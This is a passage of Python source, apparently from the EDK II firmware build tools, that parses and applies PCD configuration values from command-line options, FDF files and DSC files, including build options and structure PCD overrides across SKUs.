if (Name3, Name1) in self.DecPcds:
HasTokenSpace = True
TokenCName = Name3
TokenSpaceGuidCName = Name1
else:
FieldName = Name2
TokenCName = Name1
TokenSpaceGuidCName = ''
HasTokenSpace = False
else:
if (Name2, Name1) in self.DecPcds:
HasTokenSpace = True
TokenCName = Name2
TokenSpaceGuidCName = Name1
FieldName =""
else:
FieldName = Name2
TokenCName = Name1
TokenSpaceGuidCName = ''
HasTokenSpace = False
else:
FieldName = ""
TokenCName = pcdname
TokenSpaceGuidCName = ''
HasTokenSpace = False
TokenSpaceGuidCNameList = []
FoundFlag = False
PcdDatumType = ''
DisplayName = TokenCName
if FieldName:
DisplayName = TokenCName + '.' + FieldName
if not HasTokenSpace:
for key in self.DecPcds:
PcdItem = self.DecPcds[key]
if TokenCName == PcdItem.TokenCName:
if PcdItem.TokenSpaceGuidCName not in TokenSpaceGuidCNameList:
if len(TokenSpaceGuidCNameList) < 1:
TokenSpaceGuidCNameList.append(PcdItem.TokenSpaceGuidCName)
TokenSpaceGuidCName = PcdItem.TokenSpaceGuidCName
PcdDatumType = PcdItem.DatumType
FoundFlag = True
else:
EdkLogger.error(
'build',
AUTOGEN_ERROR,
"The Pcd %s is found under multiple different TokenSpaceGuid: %s and %s." % (DisplayName, PcdItem.TokenSpaceGuidCName, TokenSpaceGuidCNameList[0])
)
else:
if (TokenCName, TokenSpaceGuidCName) in self.DecPcds:
PcdDatumType = self.DecPcds[(TokenCName, TokenSpaceGuidCName)].DatumType
FoundFlag = True
if not FoundFlag:
if HasTokenSpace:
EdkLogger.error('build', AUTOGEN_ERROR, "The Pcd %s.%s is not found in the DEC file." % (TokenSpaceGuidCName, DisplayName))
else:
EdkLogger.error('build', AUTOGEN_ERROR, "The Pcd %s is not found in the DEC file." % (DisplayName))
pcdvalue = pcdvalue.replace("\\\\\\'", '\\\\\\"').replace('\\\'', '\'').replace('\\\\\\"', "\\'")
if FieldName:
pcdvalue = DscBuildData.HandleFlexiblePcd(TokenSpaceGuidCName, TokenCName, pcdvalue, PcdDatumType, self._GuidDict, FieldName)
else:
pcdvalue = DscBuildData.HandleFlexiblePcd(TokenSpaceGuidCName, TokenCName, pcdvalue, PcdDatumType, self._GuidDict)
IsValid, Cause = CheckPcdDatum(PcdDatumType, pcdvalue)
if not IsValid:
EdkLogger.error("build", FORMAT_INVALID, Cause, ExtraData="%s.%s" % (TokenSpaceGuidCName, TokenCName))
GlobalData.BuildOptionPcd[i] = (TokenSpaceGuidCName, TokenCName, FieldName, pcdvalue, ("build command options", 1))
if GlobalData.BuildOptionPcd:
inf_objs = [item for item in self._Bdb._CACHE_.values() if item.Arch == self.Arch and item.MetaFile.Ext.lower() == '.inf']
for pcd in GlobalData.BuildOptionPcd:
(TokenSpaceGuidCName, TokenCName, FieldName, pcdvalue, _) = pcd
for BuildData in inf_objs:
for key in BuildData.Pcds:
PcdItem = BuildData.Pcds[key]
if (TokenSpaceGuidCName, TokenCName) == (PcdItem.TokenSpaceGuidCName, PcdItem.TokenCName) and FieldName =="":
PcdItem.DefaultValue = pcdvalue
PcdItem.PcdValueFromComm = pcdvalue
# On the command line, a later whole-PCD assignment overrides any earlier field-level assignments of the same PCD.
# For example: --pcd Token.pcd.field="" --pcd Token.pcd=H"{}"
delete_assign = []
field_assign = {}
if GlobalData.BuildOptionPcd:
for pcdTuple in GlobalData.BuildOptionPcd:
TokenSpaceGuid, Token, Field = pcdTuple[0], pcdTuple[1], pcdTuple[2]
if Field:
if (TokenSpaceGuid, Token) not in field_assign:
field_assign[TokenSpaceGuid, Token] = []
field_assign[TokenSpaceGuid, Token].append(pcdTuple)
else:
if (TokenSpaceGuid, Token) in field_assign:
delete_assign.extend(field_assign[TokenSpaceGuid, Token])
field_assign[TokenSpaceGuid, Token] = []
for item in delete_assign:
GlobalData.BuildOptionPcd.remove(item)
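## Normalize a flexible PCD value given on the command line
#
#   Evaluate H"...", L'...', '...' and L-prefixed values with
#   ValueExpressionEx, quote plain strings where needed, and return the
#   normalized value.
#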
@staticmethod
def HandleFlexiblePcd(TokenSpaceGuidCName, TokenCName, PcdValue, PcdDatumType, GuidDict, FieldName=''):
if FieldName:
IsArray = False
TokenCName += '.' + FieldName
if PcdValue.startswith('H'):
if FieldName and _IsFieldValueAnArray(PcdValue[1:]):
PcdDatumType = TAB_VOID
IsArray = True
if FieldName and not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue[1:], PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
elif PcdValue.startswith("L'") or PcdValue.startswith("'"):
if FieldName and _IsFieldValueAnArray(PcdValue):
PcdDatumType = TAB_VOID
IsArray = True
if FieldName and not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue, PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
elif PcdValue.startswith('L'):
PcdValue = 'L"' + PcdValue[1:] + '"'
if FieldName and _IsFieldValueAnArray(PcdValue):
PcdDatumType = TAB_VOID
IsArray = True
if FieldName and not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue, PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
else:
if PcdValue.upper() == 'FALSE':
PcdValue = str(0)
if PcdValue.upper() == 'TRUE':
PcdValue = str(1)
if not FieldName:
if PcdDatumType not in TAB_PCD_NUMERIC_TYPES:
PcdValue = '"' + PcdValue + '"'
elif not PcdValue.isdigit() and not PcdValue.upper().startswith('0X'):
PcdValue = '"' + PcdValue + '"'
else:
IsArray = False
Base = 10
if PcdValue.upper().startswith('0X'):
Base = 16
try:
Num = int(PcdValue, Base)
except:
PcdValue = '"' + PcdValue + '"'
if _IsFieldValueAnArray(PcdValue):
PcdDatumType = TAB_VOID
IsArray = True
if not IsArray:
return PcdValue
try:
PcdValue = ValueExpressionEx(PcdValue, PcdDatumType, GuidDict)(True)
except BadExpression as Value:
EdkLogger.error('Parser', FORMAT_INVALID, 'PCD [%s.%s] Value "%s", %s' %
(TokenSpaceGuidCName, TokenCName, PcdValue, Value))
return PcdValue
## Retrieve all PCD settings in platform
@property
def Pcds(self):
if self._Pcds is None:
self._Pcds = OrderedDict()
self.__ParsePcdFromCommandLine()
self._Pcds.update(self._GetPcd(MODEL_PCD_FIXED_AT_BUILD))
self._Pcds.update(self._GetPcd(MODEL_PCD_PATCHABLE_IN_MODULE))
self._Pcds.update(self._GetPcd(MODEL_PCD_FEATURE_FLAG))
self._Pcds.update(self._GetDynamicPcd(MODEL_PCD_DYNAMIC_DEFAULT))
self._Pcds.update(self._GetDynamicHiiPcd(MODEL_PCD_DYNAMIC_HII))
self._Pcds.update(self._GetDynamicVpdPcd(MODEL_PCD_DYNAMIC_VPD))
self._Pcds.update(self._GetDynamicPcd(MODEL_PCD_DYNAMIC_EX_DEFAULT))
self._Pcds.update(self._GetDynamicHiiPcd(MODEL_PCD_DYNAMIC_EX_HII))
self._Pcds.update(self._GetDynamicVpdPcd(MODEL_PCD_DYNAMIC_EX_VPD))
self._Pcds = self.CompletePcdValues(self._Pcds)
self._Pcds = self.OverrideByFdfOverAll(self._Pcds)
self._Pcds = self.OverrideByCommOverAll(self._Pcds)
self._Pcds = self.UpdateStructuredPcds(MODEL_PCD_TYPE_LIST, self._Pcds)
self._Pcds = self.CompleteHiiPcdsDefaultStores(self._Pcds)
self._Pcds = self._FilterPcdBySkuUsage(self._Pcds)
self.RecoverCommandLinePcd()
return self._Pcds
## Retrieve [BuildOptions]
@property
def BuildOptions(self):
if self._BuildOptions is None:
self._BuildOptions = OrderedDict()
#
# Retrieve build options for EDKII- and EDK-style modules
#
for CodeBase in (EDKII_NAME, EDK_NAME):
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch, CodeBase]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
if Dummy3.upper() != TAB_COMMON:
continue
CurKey = (ToolChainFamily, ToolChain, CodeBase)
#
# Only flags can be appended
#
if CurKey not in self._BuildOptions or not ToolChain.endswith('_FLAGS') or Option.startswith('='):
self._BuildOptions[CurKey] = Option
else:
if ' ' + Option not in self._BuildOptions[CurKey]:
self._BuildOptions[CurKey] += ' ' + Option
return self._BuildOptions
def GetBuildOptionsByPkg(self, Module, ModuleType):
local_pkg = os.path.split(Module.LocalPkg())[0]
if self._ModuleTypeOptions is None:
self._ModuleTypeOptions = OrderedDict()
if ModuleType not in self._ModuleTypeOptions:
options = OrderedDict()
self._ModuleTypeOptions[ModuleType] = options
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
if Dummy2 not in (TAB_COMMON,local_pkg.upper(),"EDKII"):
continue
Type = Dummy3
if Type.upper() == ModuleType.upper():
Key = (ToolChainFamily, ToolChain)
if Key not in options or not ToolChain.endswith('_FLAGS') or Option.startswith('='):
options[Key] = Option
else:
if ' ' + Option not in options[Key]:
options[Key] += ' ' + Option
return self._ModuleTypeOptions[ModuleType]
def GetBuildOptionsByModuleType(self, Edk, ModuleType):
if self._ModuleTypeOptions is None:
self._ModuleTypeOptions = OrderedDict()
if (Edk, ModuleType) not in self._ModuleTypeOptions:
options = OrderedDict()
self._ModuleTypeOptions[Edk, ModuleType] = options
DriverType = '%s.%s' % (Edk, ModuleType)
CommonDriverType = '%s.%s' % (TAB_COMMON, ModuleType)
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
Type = Dummy2 + '.' + Dummy3
if Type.upper() == DriverType.upper() or Type.upper() == CommonDriverType.upper():
Key = (ToolChainFamily, ToolChain, Edk)
if Key not in options or not ToolChain.endswith('_FLAGS') or Option.startswith('='):
options[Key] = Option
else:
if ' ' + Option not in options[Key]:
options[Key] += ' ' + Option
return self._ModuleTypeOptions[Edk, ModuleType]
@staticmethod
def GetStructurePcdInfo(PcdSet):
structure_pcd_data = defaultdict(list)
for item in PcdSet:
structure_pcd_data[(item[0], item[1])].append(item)
return structure_pcd_data
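## Apply structure PCD field overrides defined in the FDF file
#
#   For every structure PCD referenced in the FDF PCD dictionary, record the
#   field values and their file/line locations in PcdFieldValueFromFdf.
#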
@staticmethod
def OverrideByFdf(StruPcds,workspace):
if GlobalData.gFdfParser is None:
return StruPcds
StructurePcdInFdf = OrderedDict()
fdfpcd = GlobalData.gFdfParser.Profile.PcdDict
fdfpcdlocation = GlobalData.gFdfParser.Profile.PcdLocalDict
for item in fdfpcd :
if len(item[2]) and (item[0],item[1]) in StruPcds:
StructurePcdInFdf[(item[1],item[0],item[2] )] = fdfpcd[item]
GlobalPcds = {(item[0],item[1]) for item in StructurePcdInFdf}
for Pcd in StruPcds.values():
if (Pcd.TokenSpaceGuidCName,Pcd.TokenCName) not in GlobalPcds:
continue
FieldValues = OrderedDict()
for item in StructurePcdInFdf:
if (Pcd.TokenSpaceGuidCName,Pcd.TokenCName) == (item[0],item[1]) and item[2]:
FieldValues[item[2]] = StructurePcdInFdf[item]
for field in FieldValues:
if field not in Pcd.PcdFieldValueFromFdf:
Pcd.PcdFieldValueFromFdf[field] = ["","",""]
Pcd.PcdFieldValueFromFdf[field][0] = FieldValues[field]
Pcd.PcdFieldValueFromFdf[field][1] = os.path.relpath(fdfpcdlocation[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName,field)][0],workspace)
Pcd.PcdFieldValueFromFdf[field][2] = fdfpcdlocation[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName,field)][1]
return StruPcds
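## Apply structure PCD field overrides given on the command line
#
#   For every structure PCD overridden with --pcd, record the field values
#   and their source information in PcdFieldValueFromComm.
#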
@staticmethod
def OverrideByComm(StruPcds):
StructurePcdInCom = OrderedDict()
for item in GlobalData.BuildOptionPcd:
if len(item) == 5 and (item[1], item[0]) in StruPcds:
StructurePcdInCom[(item[0], item[1], item[2] )] = (item[3], item[4])
GlobalPcds = {(item[0], item[1]) for item in StructurePcdInCom}
for Pcd in StruPcds.values():
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) not in GlobalPcds:
continue
FieldValues = OrderedDict()
for item in StructurePcdInCom:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (item[0], item[1]) and item[2]:
FieldValues[item[2]] = StructurePcdInCom[item]
for field in FieldValues:
if field not in Pcd.PcdFieldValueFromComm:
Pcd.PcdFieldValueFromComm[field] = ["", "", ""]
Pcd.PcdFieldValueFromComm[field][0] = FieldValues[field][0]
Pcd.PcdFieldValueFromComm[field][1] = FieldValues[field][1][0]
Pcd.PcdFieldValueFromComm[field][2] = FieldValues[field][1][1]
return StruPcds
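## Apply whole-PCD overrides from the build command line
#
#   Override the default value (and every SKU/default-store value) of any PCD
#   that was assigned a full value with --pcd, adjust MaxDatumSize for VOID*
#   HII PCDs when the new value is larger, and add PCDs that are only declared
#   in DEC files to the platform PCD set when necessary.
#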
def OverrideByCommOverAll(self,AllPcds):
def CheckStructureInComm(commpcds):
if not commpcds:
return False
if len(commpcds[0]) == 5:
return True
return False
NoFiledValues = OrderedDict()
if CheckStructureInComm(GlobalData.BuildOptionPcd):
StructurePcdInCom = OrderedDict()
for item in GlobalData.BuildOptionPcd:
StructurePcdInCom[(item[0], item[1], item[2] )] = (item[3], item[4])
for item in StructurePcdInCom:
if not item[2]:
NoFiledValues[(item[0], item[1])] = StructurePcdInCom[item]
else:
for item in GlobalData.BuildOptionPcd:
NoFiledValues[(item[0], item[1])] = [item[2]]
for Guid, Name in NoFiledValues:
if (Name, Guid) in AllPcds:
Pcd = AllPcds.get((Name, Guid))
if isinstance(self._DecPcds.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), None), StructurePcd):
self._DecPcds.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName)).PcdValueFromComm = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
else:
Pcd.PcdValueFromComm = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
Pcd.DefaultValue = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
for sku in Pcd.SkuInfoList:
SkuInfo = Pcd.SkuInfoList[sku]
if SkuInfo.DefaultValue:
SkuInfo.DefaultValue = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
else:
SkuInfo.HiiDefaultValue = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
for defaultstore in SkuInfo.DefaultStoreDict:
SkuInfo.DefaultStoreDict[defaultstore] = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
if Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII]]:
if Pcd.DatumType == TAB_VOID:
if not Pcd.MaxDatumSize:
Pcd.MaxDatumSize = '0'
CurrentSize = int(Pcd.MaxDatumSize, 16) if Pcd.MaxDatumSize.upper().startswith("0X") else int(Pcd.MaxDatumSize)
OptionSize = len((StringToArray(Pcd.PcdValueFromComm)).split(","))
MaxSize = max(CurrentSize, OptionSize)
Pcd.MaxDatumSize = str(MaxSize)
else:
PcdInDec = self.DecPcds.get((Name, Guid))
if PcdInDec:
PcdInDec.PcdValueFromComm = NoFiledValues[(Guid, Name)][0]
if PcdInDec.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE],
self._PCD_TYPE_STRING_[MODEL_PCD_FEATURE_FLAG],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX]]:
self._Pcds[Name, Guid] = copy.deepcopy(PcdInDec)
self._Pcds[Name, Guid].DefaultValue = NoFiledValues[( Guid, Name)][0]
if PcdInDec.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX]]:
self._Pcds[Name, Guid].SkuInfoList = {TAB_DEFAULT:SkuInfoClass(TAB_DEFAULT, self.SkuIds[TAB_DEFAULT][0], '', '', '', '', '', NoFiledValues[( Guid, Name)][0])}
return AllPcds
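## Apply whole-PCD overrides from the FDF file
#
#   Same handling as OverrideByCommOverAll, but the override values come from
#   the FDF PCD dictionary instead of the build command line.
#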
def OverrideByFdfOverAll(self,AllPcds):
if GlobalData.gFdfParser is None:
return AllPcds
NoFiledValues = GlobalData.gFdfParser.Profile.PcdDict
for Name,Guid,Field in NoFiledValues:
if len(Field):
continue
Value = NoFiledValues[(Name,Guid,Field)]
if (Name,Guid) in AllPcds:
Pcd = AllPcds.get((Name,Guid))
if isinstance(self._DecPcds.get((Pcd.TokenCName,Pcd.TokenSpaceGuidCName), None),StructurePcd):
self._DecPcds.get((Pcd.TokenCName,Pcd.TokenSpaceGuidCName)).PcdValueFromComm = Value
else:
Pcd.PcdValueFromComm = Value
Pcd.DefaultValue = Value
for sku in Pcd.SkuInfoList:
SkuInfo = Pcd.SkuInfoList[sku]
if SkuInfo.DefaultValue:
SkuInfo.DefaultValue = Value
else:
SkuInfo.HiiDefaultValue = Value
for defaultstore in SkuInfo.DefaultStoreDict:
SkuInfo.DefaultStoreDict[defaultstore] = Value
if Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII]]:
if Pcd.DatumType == TAB_VOID:
if not Pcd.MaxDatumSize:
Pcd.MaxDatumSize = '0'
CurrentSize = int(Pcd.MaxDatumSize,16) if Pcd.MaxDatumSize.upper().startswith("0X") else int(Pcd.MaxDatumSize)
OptionSize = len((StringToArray(Pcd.PcdValueFromComm)).split(","))
MaxSize = max(CurrentSize, OptionSize)
Pcd.MaxDatumSize = str(MaxSize)
else:
PcdInDec = self.DecPcds.get((Name,Guid))
if PcdInDec:
PcdInDec.PcdValueFromFdf = Value
if PcdInDec.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE],
self._PCD_TYPE_STRING_[MODEL_PCD_FEATURE_FLAG]]:
self._Pcds[Name, Guid] = copy.deepcopy(PcdInDec)
self._Pcds[Name, Guid].DefaultValue = Value
return AllPcds
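## Split a structure PCD name into its components
#
#   @retval a tuple of (TokenSpaceCName, PcdCName, DimensionAttr, Field),
#           e.g. ("Guid.Pcd[1]", "Field") -> ("Guid", "Pcd", "[1]", "Field")
#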
def ParsePcdNameStruct(self,NamePart1,NamePart2):
TokenSpaceCName = PcdCName = DimensionAttr = Field = ""
if "." in NamePart1:
TokenSpaceCName, TempPcdCName = NamePart1.split(".")
if "[" in TempPcdCName:
PcdCName = TempPcdCName[:TempPcdCName.index("[")]
DimensionAttr = TempPcdCName[TempPcdCName.index("["):]
else:
PcdCName = TempPcdCName
Field = NamePart2
else:
TokenSpaceCName = NamePart1
if "[" in NamePart2:
PcdCName = NamePart2[:NamePart2.index("[")]
DimensionAttr = NamePart2[NamePart2.index("["):]
else:
PcdCName = NamePart2
return TokenSpaceCName,PcdCName,DimensionAttr,Field
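## Resolve the final values of all structure PCDs
#
#   Collect structure PCD overrides from the DSC, DEC defaults, FDF and
#   command line, fill in missing SKU/default-store values, generate the
#   byte-array values, and merge the results back into the platform PCD set.
#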
def UpdateStructuredPcds(self, TypeList, AllPcds):
DynamicPcdType = [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_VPD],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_VPD]]
Pcds = AllPcds
DefaultStoreMgr = DefaultStore(self.DefaultStores)
SkuIds = self.SkuIds
self.SkuIdMgr.AvailableSkuIdSet.update({TAB_DEFAULT:0})
DefaultStores = {storename for pcdobj in AllPcds.values() for skuobj in pcdobj.SkuInfoList.values() for storename in skuobj.DefaultStoreDict}
DefaultStores.add(TAB_DEFAULT_STORES_DEFAULT)
S_PcdSet = []
# Find out all possible PCD candidates for self._Arch
RecordList = []
for Type in TypeList:
RecordList.extend(self._RawData[Type, self._Arch])
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, default_store, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
default_store = default_store.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in SkuIds:
continue
TCName,PCName,DimensionAttr,Field = self.ParsePcdNameStruct(TokenSpaceGuid, PcdCName)
pcd_in_dec = self._DecPcds.get((PCName,TCName), None)
if pcd_in_dec is None:
EdkLogger.error('build', PARSER_ERROR,
"Pcd (%s.%s) defined in DSC is not declared in DEC files. Arch: ['%s']" % (TCName, PCName, self._Arch),
File=self.MetaFile, Line = Dummy5)
if SkuName in SkuIds and ("." in TokenSpaceGuid or "[" in PcdCName):
if not isinstance (pcd_in_dec, StructurePcd):
EdkLogger.error('build', PARSER_ERROR,
"Pcd (%s.%s) is not declared as Structure PCD in DEC files. Arch: ['%s']" % (TCName, PCName, self._Arch),
File=self.MetaFile, Line = Dummy5)
S_PcdSet.append([ TCName,PCName,DimensionAttr,Field, SkuName, default_store, Dummy5, AnalyzePcdExpression(Setting)[0]])
# handle pcd value override
StrPcdSet = DscBuildData.GetStructurePcdInfo(S_PcdSet)
S_pcd_set = OrderedDict()
for str_pcd in StrPcdSet:
str_pcd_obj = Pcds.get((str_pcd[1], str_pcd[0]), None)
str_pcd_dec = self._DecPcds.get((str_pcd[1], str_pcd[0]), None)
str_pcd_obj_str = StructurePcd()
str_pcd_obj_str.copy(str_pcd_dec)
if str_pcd_obj:
str_pcd_obj_str.copy(str_pcd_obj)
if str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].HiiDefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
else:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].DefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
for str_pcd_data in StrPcdSet[str_pcd]:
if str_pcd_data[4] in SkuIds:
str_pcd_obj_str.AddOverrideValue(str_pcd_data[3], str(str_pcd_data[7]), TAB_DEFAULT if str_pcd_data[4] == TAB_COMMON else str_pcd_data[4], TAB_DEFAULT_STORES_DEFAULT if str_pcd_data[5] == TAB_COMMON else str_pcd_data[5], self.MetaFile.File if self.WorkspaceDir not in self.MetaFile.File else self.MetaFile.File[len(self.WorkspaceDir) if self.WorkspaceDir.endswith(os.path.sep) else len(self.WorkspaceDir)+1:], LineNo=str_pcd_data[6],DimensionAttr = str_pcd_data[2])
S_pcd_set[str_pcd[1], str_pcd[0]] = str_pcd_obj_str
# Add the Structure PCDs that are only defined in DEC files and have no override in the DSC file
for Pcd in self.DecPcds:
if isinstance(self._DecPcds[Pcd], StructurePcd):
if Pcd not in S_pcd_set:
str_pcd_obj_str = StructurePcd()
str_pcd_obj_str.copy(self._DecPcds[Pcd])
str_pcd_obj = Pcds.get(Pcd, None)
if str_pcd_obj:
str_pcd_obj_str.copy(str_pcd_obj)
if str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].HiiDefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
else:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].DefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
S_pcd_set[Pcd] = str_pcd_obj_str
if S_pcd_set:
GlobalData.gStructurePcd[self.Arch] = S_pcd_set.copy()
self.FilterStrcturePcd(S_pcd_set)
for stru_pcd in S_pcd_set.values():
for skuid in SkuIds:
if skuid in stru_pcd.SkuOverrideValues:
continue
nextskuid = self.SkuIdMgr.GetNextSkuId(skuid)
NoDefault = False
if skuid not in stru_pcd.SkuOverrideValues:
while nextskuid not in stru_pcd.SkuOverrideValues:
if nextskuid == TAB_DEFAULT:
NoDefault = True
break
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
stru_pcd.SkuOverrideValues[skuid] = copy.deepcopy(stru_pcd.SkuOverrideValues[nextskuid]) if not NoDefault else copy.deepcopy({defaultstorename: stru_pcd.DefaultValues for defaultstorename in DefaultStores} if DefaultStores else {}) #{TAB_DEFAULT_STORES_DEFAULT:stru_pcd.DefaultValues})
if not NoDefault:
stru_pcd.ValueChain.add((skuid, ''))
if 'DEFAULT' in stru_pcd.SkuOverrideValues and not GlobalData.gPcdSkuOverrides.get((stru_pcd.TokenCName, stru_pcd.TokenSpaceGuidCName)):
GlobalData.gPcdSkuOverrides.update(
{(stru_pcd.TokenCName, stru_pcd.TokenSpaceGuidCName): {'DEFAULT':stru_pcd.SkuOverrideValues['DEFAULT']}})
if stru_pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
for skuid in SkuIds:
nextskuid = skuid
NoDefault = False
if skuid not in stru_pcd.SkuOverrideValues:
while nextskuid not in stru_pcd.SkuOverrideValues:
if nextskuid == TAB_DEFAULT:
NoDefault = True
break
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
if NoDefault:
continue
PcdDefaultStoreSet = set(defaultstorename for defaultstorename in stru_pcd.SkuOverrideValues[nextskuid])
mindefaultstorename = DefaultStoreMgr.GetMin(PcdDefaultStoreSet)
for defaultstoreid in DefaultStores:
if defaultstoreid not in stru_pcd.SkuOverrideValues[skuid]:
stru_pcd.SkuOverrideValues[skuid][defaultstoreid] = CopyDict(stru_pcd.SkuOverrideValues[nextskuid][mindefaultstorename])
stru_pcd.ValueChain.add((skuid, defaultstoreid))
S_pcd_set = DscBuildData.OverrideByFdf(S_pcd_set,self.WorkspaceDir)
S_pcd_set = DscBuildData.OverrideByComm(S_pcd_set)
Str_Pcd_Values = self.GenerateByteArrayValue(S_pcd_set)
if Str_Pcd_Values:
for (skuname, StoreName, PcdGuid, PcdName, PcdValue) in Str_Pcd_Values:
str_pcd_obj = S_pcd_set.get((PcdName, PcdGuid))
if str_pcd_obj is None:
print(PcdName, PcdGuid)
raise
if str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
if skuname not in str_pcd_obj.SkuInfoList:
str_pcd_obj.SkuInfoList[skuname] = SkuInfoClass(SkuIdName=skuname, SkuId=self.SkuIds[skuname][0], HiiDefaultValue=PcdValue, DefaultStore = {StoreName:PcdValue})
else:
str_pcd_obj.SkuInfoList[skuname].HiiDefaultValue = PcdValue
str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.update({StoreName:PcdValue})
elif str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
if skuname in (self.SkuIdMgr.SystemSkuId, TAB_DEFAULT, TAB_COMMON):
str_pcd_obj.DefaultValue = PcdValue
else:
if skuname not in str_pcd_obj.SkuInfoList:
nextskuid = self.SkuIdMgr.GetNextSkuId(skuname)
NoDefault = False
while nextskuid not in str_pcd_obj.SkuInfoList:
if nextskuid == TAB_DEFAULT:
NoDefault = True
break
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
str_pcd_obj.SkuInfoList[skuname] = copy.deepcopy(str_pcd_obj.SkuInfoList[nextskuid]) if not NoDefault else SkuInfoClass(SkuIdName=skuname, SkuId=self.SkuIds[skuname][0], DefaultValue=PcdValue)
str_pcd_obj.SkuInfoList[skuname].SkuId = self.SkuIds[skuname][0]
str_pcd_obj.SkuInfoList[skuname].SkuIdName = skuname
else:
str_pcd_obj.SkuInfoList[skuname].DefaultValue = PcdValue
for str_pcd_obj in S_pcd_set.values():
